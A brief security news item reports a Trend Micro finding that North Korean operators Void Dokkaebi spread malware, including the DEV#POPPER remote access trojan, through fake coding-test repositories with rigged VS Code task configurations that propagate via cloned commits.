North Korean hackers operate self-propagating supply chain hack

North Korean state-sponsored threat operation Void Dokkaebi, also known as Famous Chollima, has leveraged phony job interviews to compromise developers with malware as part of a self-spreading supply chain intrusion campaign, GBHackers News reports.

Attacks commenced with the impersonation of cryptocurrency or AI firm recruiters in a bid to lure developers into downloading seemingly legitimate GitHub or GitLab repositories to complete a coding exam, an analysis from Trend Micro researchers showed. Opening the repositories with illicit Visual Studio Code configurations triggers automated task execution and malware infection. With the compromised code's commitment to a repository enabling the malicious .vscode configuration, subsequent cloning of the initial repository turns every additional victim into a distributor of the malware.

Void Dokkaebi was also observed to have conducted direct code injection, which was concealed through the use of a Git history-rewriting commit tampering tool. Multiple blockchain networks have been tapped to host and deploy several payloads, including a DEV#POPPER remote access trojan. Aside from compromising over 750 repositories, such a campaign was noted to have led to more than 500 nefarious VS Code task configurations and the injection of the commit tampering tool across 101 repositories.